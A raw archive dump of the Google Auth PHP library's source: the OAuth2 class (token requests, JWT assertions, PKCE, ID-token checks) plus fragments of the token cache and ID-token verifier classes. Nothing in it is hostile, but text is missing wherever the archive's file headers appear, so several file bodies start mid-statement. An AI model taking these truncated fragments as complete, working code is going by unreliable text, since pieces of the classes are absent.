verifyIdToken($publicKey = null, $allowed_algs = []) { $idToken = $this->getIdToken(); if (is_null($idToken)) { return null; } $resp = $this->jwtDecode($idToken, $publicKey, $allowed_algs); if (!property_exists($resp, 'aud')) { throw new \DomainException('No audience found the id token'); } if ($resp->aud != $this->getAudience()) { throw new \DomainException('Wrong audience present in the id token'); } return $resp; } /** * Obtains the encoded jwt from the instance data. * * @param array $config array optional configuration parameters * @return string */ public function toJwt(array $config = []) { if (is_null($this->getSigningKey())) { throw new \DomainException('No signing key available'); } if (is_null($this->getSigningAlgorithm())) { throw new \DomainException('No signing algorithm specified'); } $now = time(); $opts = array_merge([ 'skew' => self::DEFAULT_SKEW_SECONDS, ], $config); $assertion = [ 'iss' => $this->getIssuer(), 'exp' => ($now + $this->getExpiry()), 'iat' => ($now - $opts['skew']), ]; foreach ($assertion as $k => $v) { if (is_null($v)) { throw new \DomainException($k . ' should not be null'); } } if (!(is_null($this->getAudience()))) { $assertion['aud'] = $this->getAudience(); } if (!(is_null($this->getScope()))) { $assertion['scope'] = $this->getScope(); } if (empty($assertion['scope']) && empty($assertion['aud'])) { throw new \DomainException('one of scope or aud should not be null'); } if (!(is_null($this->getSub()))) { $assertion['sub'] = $this->getSub(); } $assertion += $this->getAdditionalClaims(); return JWT::encode( $assertion, $this->getSigningKey(), $this->getSigningAlgorithm(), $this->getSigningKeyId() ); } /** * Generates a request for token credentials. * * @param callable $httpHandler callback which delivers psr7 request * @return RequestInterface the authorization Url. */ public function generateCredentialsRequest(callable $httpHandler = null) { $uri = $this->getTokenCredentialUri(); if (is_null($uri)) { throw new \DomainException('No token credential URI was set.'); } $grantType = $this->getGrantType(); $params = ['grant_type' => $grantType]; switch ($grantType) { case 'authorization_code': $params['code'] = $this->getCode(); $params['redirect_uri'] = $this->getRedirectUri(); if ($this->codeVerifier) { $params['code_verifier'] = $this->codeVerifier; } $this->addClientCredentials($params); break; case 'password': $params['username'] = $this->getUsername(); $params['password'] = $this->getPassword(); $this->addClientCredentials($params); break; case 'refresh_token': $params['refresh_token'] = $this->getRefreshToken(); $this->addClientCredentials($params); break; case self::JWT_URN: $params['assertion'] = $this->toJwt(); break; case self::STS_URN: $token = $this->subjectTokenFetcher->fetchSubjectToken($httpHandler); $params['subject_token'] = $token; $params['subject_token_type'] = $this->subjectTokenType; $params += array_filter([ 'resource' => $this->resource, 'audience' => $this->audience, 'scope' => $this->getScope(), 'requested_token_type' => self::STS_REQUESTED_TOKEN_TYPE, 'actor_token' => $this->actorToken, 'actor_token_type' => $this->actorTokenType, ]); break; default: if (!is_null($this->getRedirectUri())) { # Grant type was supposed to be 'authorization_code', as there # is a redirect URI. throw new \DomainException('Missing authorization code'); } unset($params['grant_type']); if (!is_null($grantType)) { $params['grant_type'] = $grantType; } $params = array_merge($params, $this->getExtensionParams()); } $headers = [ 'Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded', ]; return new Request( 'POST', $uri, $headers, Query::build($params) ); } /** * Fetches the auth tokens based on the current state. * * @param callable $httpHandler callback which delivers psr7 request * @return array the response */ public function fetchAuthToken(callable $httpHandler = null) { if (is_null($httpHandler)) { $httpHandler = HttpHandlerFactory::build(HttpClientCache::getHttpClient()); } $response = $httpHandler($this->generateCredentialsRequest($httpHandler)); $credentials = $this->parseTokenResponse($response); $this->updateToken($credentials); if (isset($credentials['scope'])) { $this->setGrantedScope($credentials['scope']); } return $credentials; } /** * Obtains a key that can used to cache the results of #fetchAuthToken. * * The key is derived from the scopes. * * @return ?string a key that may be used to cache the auth token. */ public function getCacheKey() { if (is_array($this->scope)) { return implode(':', $this->scope); } if ($this->audience) { return $this->audience; } // If scope has not set, return null to indicate no caching. return null; } /** * Parses the fetched tokens. * * @param ResponseInterface $resp the response. * @return array the tokens parsed from the response body. * @throws \Exception */ public function parseTokenResponse(ResponseInterface $resp) { $body = (string)$resp->getBody(); if ($resp->hasHeader('Content-Type') && $resp->getHeaderLine('Content-Type') == 'application/x-www-form-urlencoded' ) { $res = []; parse_str($body, $res); return $res; } // Assume it's JSON; if it's not throw an exception if (null === $res = json_decode($body, true)) { throw new \Exception('Invalid JSON response'); } return $res; } /** * Updates an OAuth 2.0 client. * * Example: * ``` * $oauth->updateToken([ * 'refresh_token' => 'n4E9O119d', * 'access_token' => 'FJQbwq9', * 'expires_in' => 3600 * ]); * ``` * * @param array $config * The configuration parameters related to the token. * * - refresh_token * The refresh token associated with the access token * to be refreshed. * * - access_token * The current access token for this client. * * - id_token * The current ID token for this client. * * - expires_in * The time in seconds until access token expiration. * * - expires_at * The time as an integer number of seconds since the Epoch * * - issued_at * The timestamp that the token was issued at. * @return void */ public function updateToken(array $config) { $opts = array_merge([ 'extensionParams' => [], 'access_token' => null, 'id_token' => null, 'expires_in' => null, 'expires_at' => null, 'issued_at' => null, 'scope' => null, ], $config); $this->setExpiresAt($opts['expires_at']); $this->setExpiresIn($opts['expires_in']); // By default, the token is issued at `Time.now` when `expiresIn` is set, // but this can be used to supply a more precise time. if (!is_null($opts['issued_at'])) { $this->setIssuedAt($opts['issued_at']); } $this->setAccessToken($opts['access_token']); $this->setIdToken($opts['id_token']); // The refresh token should only be updated if a value is explicitly // passed in, as some access token responses do not include a refresh // token. if (array_key_exists('refresh_token', $opts)) { $this->setRefreshToken($opts['refresh_token']); } // Required for STS response. An identifier for the representation of // the issued security token. if (array_key_exists('issued_token_type', $opts)) { $this->issuedTokenType = $opts['issued_token_type']; } } /** * Builds the authorization Uri that the user should be redirected to. * * @param array $config configuration options that customize the return url. * @return UriInterface the authorization Url. * @throws InvalidArgumentException */ public function buildFullAuthorizationUri(array $config = []) { if (is_null($this->getAuthorizationUri())) { throw new InvalidArgumentException( 'requires an authorizationUri to have been set' ); } $params = array_merge([ 'response_type' => 'code', 'access_type' => 'offline', 'client_id' => $this->clientId, 'redirect_uri' => $this->redirectUri, 'state' => $this->state, 'scope' => $this->getScope(), ], $config); // Validate the auth_params if (is_null($params['client_id'])) { throw new InvalidArgumentException( 'missing the required client identifier' ); } if (is_null($params['redirect_uri'])) { throw new InvalidArgumentException('missing the required redirect URI'); } if (!empty($params['prompt']) && !empty($params['approval_prompt'])) { throw new InvalidArgumentException( 'prompt and approval_prompt are mutually exclusive' ); } if ($this->codeVerifier) { $params['code_challenge'] = $this->getCodeChallenge($this->codeVerifier); $params['code_challenge_method'] = $this->getCodeChallengeMethod(); } // Construct the uri object; return it if it is valid. $result = clone $this->authorizationUri; $existingParams = Query::parse($result->getQuery()); $result = $result->withQuery( Query::build(array_merge($existingParams, $params)) ); if ($result->getScheme() != 'https') { throw new InvalidArgumentException( 'Authorization endpoint must be protected by TLS' ); } return $result; } /** * @return string|null */ public function getCodeVerifier(): ?string { return $this->codeVerifier; } /** * A cryptographically random string that is used to correlate the * authorization request to the token request. * * The code verifier for PKCE for OAuth 2.0. When set, the authorization * URI will contain the Code Challenge and Code Challenge Method querystring * parameters, and the token URI will contain the Code Verifier parameter. * * @see https://datatracker.ietf.org/doc/html/rfc7636 * * @param string|null $codeVerifier */ public function setCodeVerifier(?string $codeVerifier): void { $this->codeVerifier = $codeVerifier; } /** * Generates a random 128-character string for the "code_verifier" parameter * in PKCE for OAuth 2.0. This is a cryptographically random string that is * determined using random_int, hashed using "hash" and sha256, and base64 * encoded. * * When this method is called, the code verifier is set on the object. * * @return string */ public function generateCodeVerifier(): string { return $this->codeVerifier = $this->generateRandomString(128); } private function getCodeChallenge(string $randomString): string { return rtrim(strtr(base64_encode(hash('sha256', $randomString, true)), '+/', '-_'), '='); } private function getCodeChallengeMethod(): string { return 'S256'; } private function generateRandomString(int $length): string { $validChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~'; $validCharsLen = strlen($validChars); $str = ''; $i = 0; while ($i++ < $length) { $str .= $validChars[random_int(0, $validCharsLen - 1)]; } return $str; } /** * Sets the authorization server's HTTP endpoint capable of authenticating * the end-user and obtaining authorization. * * @param string $uri * @return void */ public function setAuthorizationUri($uri) { $this->authorizationUri = $this->coerceUri($uri); } /** * Gets the authorization server's HTTP endpoint capable of authenticating * the end-user and obtaining authorization. * * @return ?UriInterface */ public function getAuthorizationUri() { return $this->authorizationUri; } /** * Gets the authorization server's HTTP endpoint capable of issuing tokens * and refreshing expired tokens. * * @return ?UriInterface */ public function getTokenCredentialUri() { return $this->tokenCredentialUri; } /** * Sets the authorization server's HTTP endpoint capable of issuing tokens * and refreshing expired tokens. * * @param string $uri * @return void */ public function setTokenCredentialUri($uri) { $this->tokenCredentialUri = $this->coerceUri($uri); } /** * Gets the redirection URI used in the initial request. * * @return ?string */ public function getRedirectUri() { return $this->redirectUri; } /** * Sets the redirection URI used in the initial request. * * @param ?string $uri * @return void */ public function setRedirectUri($uri) { if (is_null($uri)) { $this->redirectUri = null; return; } // redirect URI must be absolute if (!$this->isAbsoluteUri($uri)) { // "postmessage" is a reserved URI string in Google-land // @see https://developers.google.com/identity/sign-in/web/server-side-flow if ('postmessage' !== (string)$uri) { throw new InvalidArgumentException( 'Redirect URI must be absolute' ); } } $this->redirectUri = (string)$uri; } /** * Gets the scope of the access requests as a space-delimited String. * * @return ?string */ public function getScope() { if (is_null($this->scope)) { return $this->scope; } return implode(' ', $this->scope); } /** * Sets the scope of the access request, expressed either as an Array or as * a space-delimited String. * * @param string|array|null $scope * @return void * @throws InvalidArgumentException */ public function setScope($scope) { if (is_null($scope)) { $this->scope = null; } elseif (is_string($scope)) { $this->scope = explode(' ', $scope); } elseif (is_array($scope)) { foreach ($scope as $s) { $pos = strpos($s, ' '); if ($pos !== false) { throw new InvalidArgumentException( 'array scope values should not contain spaces' ); } } $this->scope = $scope; } else { throw new InvalidArgumentException( 'scopes should be a string or array of strings' ); } } /** * Gets the current grant type. * * @return ?string */ public function getGrantType() { if (!is_null($this->grantType)) { return $this->grantType; } // Returns the inferred grant type, based on the current object instance // state. if (!is_null($this->code)) { return 'authorization_code'; } if (!is_null($this->refreshToken)) { return 'refresh_token'; } if (!is_null($this->username) && !is_null($this->password)) { return 'password'; } if (!is_null($this->issuer) && !is_null($this->signingKey)) { return self::JWT_URN; } if (!is_null($this->subjectTokenFetcher) && !is_null($this->subjectTokenType)) { return self::STS_URN; } return null; } /** * Sets the current grant type. * * @param string $grantType * @return void * @throws InvalidArgumentException */ public function setGrantType($grantType) { if (in_array($grantType, self::$knownGrantTypes)) { $this->grantType = $grantType; } else { // validate URI if (!$this->isAbsoluteUri($grantType)) { throw new InvalidArgumentException( 'invalid grant type' ); } $this->grantType = (string)$grantType; } } /** * Gets an arbitrary string designed to allow the client to maintain state. * * @return string */ public function getState() { return $this->state; } /** * Sets an arbitrary string designed to allow the client to maintain state. * * @param string $state * @return void */ public function setState($state) { $this->state = $state; } /** * Gets the authorization code issued to this client. * * @return string */ public function getCode() { return $this->code; } /** * Sets the authorization code issued to this client. * * @param string $code * @return void */ public function setCode($code) { $this->code = $code; } /** * Gets the resource owner's username. * * @return string */ public function getUsername() { return $this->username; } /** * Sets the resource owner's username. * * @param string $username * @return void */ public function setUsername($username) { $this->username = $username; } /** * Gets the resource owner's password. * * @return string */ public function getPassword() { return $this->password; } /** * Sets the resource owner's password. * * @param string $password * @return void */ public function setPassword($password) { $this->password = $password; } /** * Sets a unique identifier issued to the client to identify itself to the * authorization server. * * @return string */ public function getClientId() { return $this->clientId; } /** * Sets a unique identifier issued to the client to identify itself to the * authorization server. * * @param string $clientId * @return void */ public function setClientId($clientId) { $this->clientId = $clientId; } /** * Gets a shared symmetric secret issued by the authorization server, which * is used to authenticate the client. * * @return string */ public function getClientSecret() { return $this->clientSecret; } /** * Sets a shared symmetric secret issued by the authorization server, which * is used to authenticate the client. * * @param string $clientSecret * @return void */ public function setClientSecret($clientSecret) { $this->clientSecret = $clientSecret; } /** * Gets the Issuer ID when using assertion profile. * * @return ?string */ public function getIssuer() { return $this->issuer; } /** * Sets the Issuer ID when using assertion profile. * * @param string $issuer * @return void */ public function setIssuer($issuer) { $this->issuer = $issuer; } /** * Gets the target sub when issuing assertions. * * @return ?string */ public function getSub() { return $this->sub; } /** * Sets the target sub when issuing assertions. * * @param string $sub * @return void */ public function setSub($sub) { $this->sub = $sub; } /** * Gets the target audience when issuing assertions. * * @return ?string */ public function getAudience() { return $this->audience; } /** * Sets the target audience when issuing assertions. * * @param string $audience * @return void */ public function setAudience($audience) { $this->audience = $audience; } /** * Gets the signing key when using an assertion profile. * * @return ?string */ public function getSigningKey() { return $this->signingKey; } /** * Sets the signing key when using an assertion profile. * * @param string $signingKey * @return void */ public function setSigningKey($signingKey) { $this->signingKey = $signingKey; } /** * Gets the signing key id when using an assertion profile. * * @return ?string */ public function getSigningKeyId() { return $this->signingKeyId; } /** * Sets the signing key id when using an assertion profile. * * @param string $signingKeyId * @return void */ public function setSigningKeyId($signingKeyId) { $this->signingKeyId = $signingKeyId; } /** * Gets the signing algorithm when using an assertion profile. * * @return ?string */ public function getSigningAlgorithm() { return $this->signingAlgorithm; } /** * Sets the signing algorithm when using an assertion profile. * * @param ?string $signingAlgorithm * @return void */ public function setSigningAlgorithm($signingAlgorithm) { if (is_null($signingAlgorithm)) { $this->signingAlgorithm = null; } elseif (!in_array($signingAlgorithm, self::$knownSigningAlgorithms)) { throw new InvalidArgumentException('unknown signing algorithm'); } else { $this->signingAlgorithm = $signingAlgorithm; } } /** * Gets the set of parameters used by extension when using an extension * grant type. * * @return array */ public function getExtensionParams() { return $this->extensionParams; } /** * Sets the set of parameters used by extension when using an extension * grant type. * * @param array $extensionParams * @return void */ public function setExtensionParams($extensionParams) { $this->extensionParams = $extensionParams; } /** * Gets the number of seconds assertions are valid for. * * @return int */ public function getExpiry() { return $this->expiry; } /** * Sets the number of seconds assertions are valid for. * * @param int $expiry * @return void */ public function setExpiry($expiry) { $this->expiry = $expiry; } /** * Gets the lifetime of the access token in seconds. * * @return int */ public function getExpiresIn() { return $this->expiresIn; } /** * Sets the lifetime of the access token in seconds. * * @param ?int $expiresIn * @return void */ public function setExpiresIn($expiresIn) { if (is_null($expiresIn)) { $this->expiresIn = null; $this->issuedAt = null; } else { $this->issuedAt = time(); $this->expiresIn = (int)$expiresIn; } } /** * Gets the time the current access token expires at. * * @return ?int */ public function getExpiresAt() { if (!is_null($this->expiresAt)) { return $this->expiresAt; } if (!is_null($this->issuedAt) && !is_null($this->expiresIn)) { return $this->issuedAt + $this->expiresIn; } return null; } /** * Returns true if the acccess token has expired. * * @return bool */ public function isExpired() { $expiration = $this->getExpiresAt(); $now = time(); return !is_null($expiration) && $now >= $expiration; } /** * Sets the time the current access token expires at. * * @param int $expiresAt * @return void */ public function setExpiresAt($expiresAt) { $this->expiresAt = $expiresAt; } /** * Gets the time the current access token was issued at. * * @return ?int */ public function getIssuedAt() { return $this->issuedAt; } /** * Sets the time the current access token was issued at. * * @param int $issuedAt * @return void */ public function setIssuedAt($issuedAt) { $this->issuedAt = $issuedAt; } /** * Gets the current access token. * * @return ?string */ public function getAccessToken() { return $this->accessToken; } /** * Sets the current access token. * * @param string $accessToken * @return void */ public function setAccessToken($accessToken) { $this->accessToken = $accessToken; } /** * Gets the current ID token. * * @return ?string */ public function getIdToken() { return $this->idToken; } /** * Sets the current ID token. * * @param string $idToken * @return void */ public function setIdToken($idToken) { $this->idToken = $idToken; } /** * Get the granted space-separated scopes (if they exist) for the last * fetched token. * * @return string|null */ public function getGrantedScope() { return $this->grantedScope; } /** * Sets the current ID token. * * @param string $grantedScope * @return void */ public function setGrantedScope($grantedScope) { $this->grantedScope = $grantedScope; } /** * Gets the refresh token associated with the current access token. * * @return ?string */ public function getRefreshToken() { return $this->refreshToken; } /** * Sets the refresh token associated with the current access token. * * @param string $refreshToken * @return void */ public function setRefreshToken($refreshToken) { $this->refreshToken = $refreshToken; } /** * Sets additional claims to be included in the JWT token * * @param array $additionalClaims * @return void */ public function setAdditionalClaims(array $additionalClaims) { $this->additionalClaims = $additionalClaims; } /** * Gets the additional claims to be included in the JWT token. * * @return array */ public function getAdditionalClaims() { return $this->additionalClaims; } /** * Gets the additional claims to be included in the JWT token. * * @return ?string */ public function getIssuedTokenType() { return $this->issuedTokenType; } /** * The expiration of the last received token. * * @return array|null */ public function getLastReceivedToken() { if ($token = $this->getAccessToken()) { // the bare necessity of an auth token $authToken = [ 'access_token' => $token, 'expires_at' => $this->getExpiresAt(), ]; } elseif ($idToken = $this->getIdToken()) { $authToken = [ 'id_token' => $idToken, 'expires_at' => $this->getExpiresAt(), ]; } else { return null; } if ($expiresIn = $this->getExpiresIn()) { $authToken['expires_in'] = $expiresIn; } if ($issuedAt = $this->getIssuedAt()) { $authToken['issued_at'] = $issuedAt; } if ($refreshToken = $this->getRefreshToken()) { $authToken['refresh_token'] = $refreshToken; } return $authToken; } /** * Get the client ID. * * Alias of {@see Google\Auth\OAuth2::getClientId()}. * * @param callable $httpHandler * @return string * @access private */ public function getClientName(callable $httpHandler = null) { return $this->getClientId(); } /** * @todo handle uri as array * * @param ?string $uri * @return null|UriInterface */ private function coerceUri($uri) { if (is_null($uri)) { return null; } return Utils::uriFor($uri); } /** * @param string $idToken * @param Key|Key[]|string|string[] $publicKey * @param string|string[] $allowedAlgs * @return object */ private function jwtDecode($idToken, $publicKey, $allowedAlgs) { $keys = $this->getFirebaseJwtKeys($publicKey, $allowedAlgs); // Default exception if none are caught. We are using the same exception // class and message from firebase/php-jwt to preserve backwards // compatibility. $e = new \InvalidArgumentException('Key may not be empty'); foreach ($keys as $key) { try { return JWT::decode($idToken, $key); } catch (\Exception $e) { // try next alg } } throw $e; } /** * @param Key|Key[]|string|string[] $publicKey * @param string|string[] $allowedAlgs * @return Key[] */ private function getFirebaseJwtKeys($publicKey, $allowedAlgs) { // If $publicKey is instance of Key, return it if ($publicKey instanceof Key) { return [$publicKey]; } // If $allowedAlgs is empty, $publicKey must be Key or Key[]. if (empty($allowedAlgs)) { $keys = []; foreach ((array) $publicKey as $kid => $pubKey) { if (!$pubKey instanceof Key) { throw new \InvalidArgumentException(sprintf( 'When allowed algorithms is empty, the public key must' . 'be an instance of %s or an array of %s objects', Key::class, Key::class )); } $keys[$kid] = $pubKey; } return $keys; } $allowedAlg = null; if (is_string($allowedAlgs)) { $allowedAlg = $allowedAlgs; } elseif (is_array($allowedAlgs)) { if (count($allowedAlgs) > 1) { throw new \InvalidArgumentException( 'To have multiple allowed algorithms, You must provide an' . ' array of Firebase\JWT\Key objects.' . ' See https://github.com/firebase/php-jwt for more information.'); } $allowedAlg = array_pop($allowedAlgs); } else { throw new \InvalidArgumentException('allowed algorithms must be a string or array.'); } if (is_array($publicKey)) { // When publicKey is greater than 1, create keys with the single alg. $keys = []; foreach ($publicKey as $kid => $pubKey) { if ($pubKey instanceof Key) { $keys[$kid] = $pubKey; } else { $keys[$kid] = new Key($pubKey, $allowedAlg); } } return $keys; } return [new Key($publicKey, $allowedAlg)]; } /** * Determines if the URI is absolute based on its scheme and host or path * (RFC 3986). * * @param string $uri * @return bool */ private function isAbsoluteUri($uri) { $uri = $this->coerceUri($uri); return $uri->getScheme() && ($uri->getHost() || $uri->getPath()); } /** * @param array $params * @return array */ private function addClientCredentials(&$params) { $clientId = $this->getClientId(); $clientSecret = $this->getClientSecret(); if ($clientId && $clientSecret) { $params['client_id'] = $clientId; $params['client_secret'] = $clientSecret; } return $params; } } google-api/vendor/google/auth/src/IamSignerTrait.php000064400000004342147600400120016460 0ustar00iam ?: new Iam($httpHandler); $email = $this->getClientName($httpHandler); if (is_null($accessToken)) { $previousToken = $this->getLastReceivedToken(); $accessToken = $previousToken ? $previousToken['access_token'] : $this->fetchAuthToken($httpHandler)['access_token']; } return $signer->signBlob($email, $accessToken, $stringToSign); } } google-api/vendor/google/auth/src/SignBlobInterface.php000064400000002773147600400120017124 0ustar00 $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array updated metadata hashmap */ public function updateMetadata( $metadata, $authUri = null, callable $httpHandler = null ) { if (isset($metadata[self::AUTH_METADATA_KEY])) { // Auth metadata has already been set return $metadata; } $result = $this->fetchAuthToken($httpHandler); $metadata_copy = $metadata; if (isset($result['access_token'])) { $metadata_copy[self::AUTH_METADATA_KEY] = ['Bearer ' . $result['access_token']]; } elseif (isset($result['id_token'])) { $metadata_copy[self::AUTH_METADATA_KEY] = ['Bearer ' . $result['id_token']]; } return $metadata_copy; } } google-api/vendor/google/auth/src/FetchAuthTokenCache.php000064400000022413147600400120017375 0ustar00 $cacheConfig Configuration for the cache * @param CacheItemPoolInterface $cache */ public function __construct( FetchAuthTokenInterface $fetcher, array $cacheConfig = null, CacheItemPoolInterface $cache ) { $this->fetcher = $fetcher; $this->cache = $cache; $this->cacheConfig = array_merge([ 'lifetime' => 1500, 'prefix' => '', ], (array) $cacheConfig); } /** * @return FetchAuthTokenInterface */ public function getFetcher() { return $this->fetcher; } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * Checks the cache for a valid auth token and fetches the auth tokens * from the supplied fetcher. * * @param callable $httpHandler callback which delivers psr7 request * @return array the response * @throws \Exception */ public function fetchAuthToken(callable $httpHandler = null) { if ($cached = $this->fetchAuthTokenFromCache()) { return $cached; } $auth_token = $this->fetcher->fetchAuthToken($httpHandler); $this->saveAuthTokenInCache($auth_token); return $auth_token; } /** * @return string */ public function getCacheKey() { return $this->getFullCacheKey($this->fetcher->getCacheKey()); } /** * @return array|null */ public function getLastReceivedToken() { return $this->fetcher->getLastReceivedToken(); } /** * Get the client name from the fetcher. * * @param callable $httpHandler An HTTP handler to deliver PSR7 requests. * @return string */ public function getClientName(callable $httpHandler = null) { if (!$this->fetcher instanceof SignBlobInterface) { throw new \RuntimeException( 'Credentials fetcher does not implement ' . 'Google\Auth\SignBlobInterface' ); } return $this->fetcher->getClientName($httpHandler); } /** * Sign a blob using the fetcher. * * @param string $stringToSign The string to sign. * @param bool $forceOpenSsl Require use of OpenSSL for local signing. Does * not apply to signing done using external services. **Defaults to** * `false`. * @return string The resulting signature. * @throws \RuntimeException If the fetcher does not implement * `Google\Auth\SignBlobInterface`. */ public function signBlob($stringToSign, $forceOpenSsl = false) { if (!$this->fetcher instanceof SignBlobInterface) { throw new \RuntimeException( 'Credentials fetcher does not implement ' . 'Google\Auth\SignBlobInterface' ); } // Pass the access token from cache to GCECredentials for signing a blob. // This saves a call to the metadata server when a cached token exists. if ($this->fetcher instanceof Credentials\GCECredentials) { $cached = $this->fetchAuthTokenFromCache(); $accessToken = $cached['access_token'] ?? null; return $this->fetcher->signBlob($stringToSign, $forceOpenSsl, $accessToken); } return $this->fetcher->signBlob($stringToSign, $forceOpenSsl); } /** * Get the quota project used for this API request from the credentials * fetcher. * * @return string|null */ public function getQuotaProject() { if ($this->fetcher instanceof GetQuotaProjectInterface) { return $this->fetcher->getQuotaProject(); } return null; } /* * Get the Project ID from the fetcher. * * @param callable $httpHandler Callback which delivers psr7 request * @return string|null * @throws \RuntimeException If the fetcher does not implement * `Google\Auth\ProvidesProjectIdInterface`. */ public function getProjectId(callable $httpHandler = null) { if (!$this->fetcher instanceof ProjectIdProviderInterface) { throw new \RuntimeException( 'Credentials fetcher does not implement ' . 'Google\Auth\ProvidesProjectIdInterface' ); } return $this->fetcher->getProjectId($httpHandler); } /* * Get the Universe Domain from the fetcher. * * @return string */ public function getUniverseDomain(): string { if ($this->fetcher instanceof GetUniverseDomainInterface) { return $this->fetcher->getUniverseDomain(); } return GetUniverseDomainInterface::DEFAULT_UNIVERSE_DOMAIN; } /** * Updates metadata with the authorization token. * * @param array $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array updated metadata hashmap * @throws \RuntimeException If the fetcher does not implement * `Google\Auth\UpdateMetadataInterface`. */ public function updateMetadata( $metadata, $authUri = null, callable $httpHandler = null ) { if (!$this->fetcher instanceof UpdateMetadataInterface) { throw new \RuntimeException( 'Credentials fetcher does not implement ' . 'Google\Auth\UpdateMetadataInterface' ); } $cached = $this->fetchAuthTokenFromCache($authUri); if ($cached) { // Set the access token in the `Authorization` metadata header so // the downstream call to updateMetadata know they don't need to // fetch another token. if (isset($cached['access_token'])) { $metadata[self::AUTH_METADATA_KEY] = [ 'Bearer ' . $cached['access_token'] ]; } elseif (isset($cached['id_token'])) { $metadata[self::AUTH_METADATA_KEY] = [ 'Bearer ' . $cached['id_token'] ]; } } $newMetadata = $this->fetcher->updateMetadata( $metadata, $authUri, $httpHandler ); if (!$cached && $token = $this->fetcher->getLastReceivedToken()) { $this->saveAuthTokenInCache($token, $authUri); } return $newMetadata; } /** * @param string|null $authUri * @return array|null */ private function fetchAuthTokenFromCache($authUri = null) { // Use the cached value if its available. // // TODO: correct caching; update the call to setCachedValue to set the expiry // to the value returned with the auth token. // // TODO: correct caching; enable the cache to be cleared. // if $authUri is set, use it as the cache key $cacheKey = $authUri ? $this->getFullCacheKey($authUri) : $this->fetcher->getCacheKey(); $cached = $this->getCachedValue($cacheKey); if (is_array($cached)) { if (empty($cached['expires_at'])) { // If there is no expiration data, assume token is not expired. // (for JwtAccess and ID tokens) return $cached; } if ((time() + $this->eagerRefreshThresholdSeconds) < $cached['expires_at']) { // access token is not expired return $cached; } } return null; } /** * @param array $authToken * @param string|null $authUri * @return void */ private function saveAuthTokenInCache($authToken, $authUri = null) { if (isset($authToken['access_token']) || isset($authToken['id_token'])) { // if $authUri is set, use it as the cache key $cacheKey = $authUri ? $this->getFullCacheKey($authUri) : $this->fetcher->getCacheKey(); $this->setCachedValue($cacheKey, $authToken); } } } google-api/vendor/google/auth/src/ExternalAccountCredentialSourceInterface.php000064400000001366147600400120023675 0ustar00httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); $this->cache = $cache ?: new MemoryCacheItemPool(); } /** * Verifies an id token and returns the authenticated apiLoginTicket. * Throws an exception if the id token is not valid. * The audience parameter can be used to control which id tokens are * accepted. By default, the id token must have been issued to this OAuth2 client. * * @param string $token The JSON Web Token to be verified. * @param array $options [optional] { * Configuration options. * @type string $audience The indended recipient of the token. * @type string $issuer The intended issuer of the token. * @type string $cacheKey The cache key of the cached certs. Defaults to * the sha1 of $certsLocation if provided, otherwise is set to * "federated_signon_certs_v3". * @type string $certsLocation The location (remote or local) from which * to retrieve certificates, if not cached. This value should only be * provided in limited circumstances in which you are sure of the * behavior. * @type bool $throwException Whether the function should throw an * exception if the verification fails. This is useful for * determining the reason verification failed. * } * @return array|false the token payload, if successful, or false if not. * @throws InvalidArgumentException If certs could not be retrieved from a local file. * @throws InvalidArgumentException If received certs are in an invalid format. * @throws InvalidArgumentException If the cert alg is not supported. * @throws RuntimeException If certs could not be retrieved from a remote location. * @throws UnexpectedValueException If the token issuer does not match. * @throws UnexpectedValueException If the token audience does not match. */ public function verify($token, array $options = []) { $audience = $options['audience'] ?? null; $issuer = $options['issuer'] ?? null; $certsLocation = $options['certsLocation'] ?? self::FEDERATED_SIGNON_CERT_URL; $cacheKey = $options['cacheKey'] ?? $this->getCacheKeyFromCertLocation($certsLocation); $throwException = $options['throwException'] ?? false; // for backwards compatibility // Check signature against each available cert. $certs = $this->getCerts($certsLocation, $cacheKey, $options); $alg = $this->determineAlg($certs); if (!in_array($alg, ['RS256', 'ES256'])) { throw new InvalidArgumentException( 'unrecognized "alg" in certs, expected ES256 or RS256' ); } try { if ($alg == 'RS256') { return $this->verifyRs256($token, $certs, $audience, $issuer); } return $this->verifyEs256($token, $certs, $audience, $issuer); } catch (ExpiredException $e) { // firebase/php-jwt 5+ } catch (SignatureInvalidException $e) { // firebase/php-jwt 5+ } catch (InvalidTokenException $e) { // simplejwt } catch (InvalidArgumentException $e) { } catch (UnexpectedValueException $e) { } if ($throwException) { throw $e; } return false; } /** * Identifies the expected algorithm to verify by looking at the "alg" key * of the provided certs. * * @param array $certs Certificate array according to the JWK spec (see * https://tools.ietf.org/html/rfc7517). * @return string The expected algorithm, such as "ES256" or "RS256". */ private function determineAlg(array $certs) { $alg = null; foreach ($certs as $cert) { if (empty($cert['alg'])) { throw new InvalidArgumentException( 'certs expects "alg" to be set' ); } $alg = $alg ?: $cert['alg']; if ($alg != $cert['alg']) { throw new InvalidArgumentException( 'More than one alg detected in certs' ); } } return $alg; } /** * Verifies an ES256-signed JWT. * * @param string $token The JSON Web Token to be verified. * @param array $certs Certificate array according to the JWK spec (see * https://tools.ietf.org/html/rfc7517). * @param string|null $audience If set, returns false if the provided * audience does not match the "aud" claim on the JWT. * @param string|null $issuer If set, returns false if the provided * issuer does not match the "iss" claim on the JWT. * @return array the token payload, if successful, or false if not. */ private function verifyEs256($token, array $certs, $audience = null, $issuer = null) { $this->checkSimpleJwt(); $jwkset = new KeySet(); foreach ($certs as $cert) { $jwkset->add(KeyFactory::create($cert, 'php')); } // Validate the signature using the key set and ES256 algorithm. $jwt = $this->callSimpleJwtDecode([$token, $jwkset, 'ES256']); $payload = $jwt->getClaims(); if ($audience) { if (!isset($payload['aud']) || $payload['aud'] != $audience) { throw new UnexpectedValueException('Audience does not match'); } } // @see https://cloud.google.com/iap/docs/signed-headers-howto#verifying_the_jwt_payload $issuer = $issuer ?: self::IAP_ISSUER; if (!isset($payload['iss']) || $payload['iss'] !== $issuer) { throw new UnexpectedValueException('Issuer does not match'); } return $payload; } /** * Verifies an RS256-signed JWT. * * @param string $token The JSON Web Token to be verified. * @param array $certs Certificate array according to the JWK spec (see * https://tools.ietf.org/html/rfc7517). * @param string|null $audience If set, returns false if the provided * audience does not match the "aud" claim on the JWT. * @param string|null $issuer If set, returns false if the provided * issuer does not match the "iss" claim on the JWT. * @return array the token payload, if successful, or false if not. */ private function verifyRs256($token, array $certs, 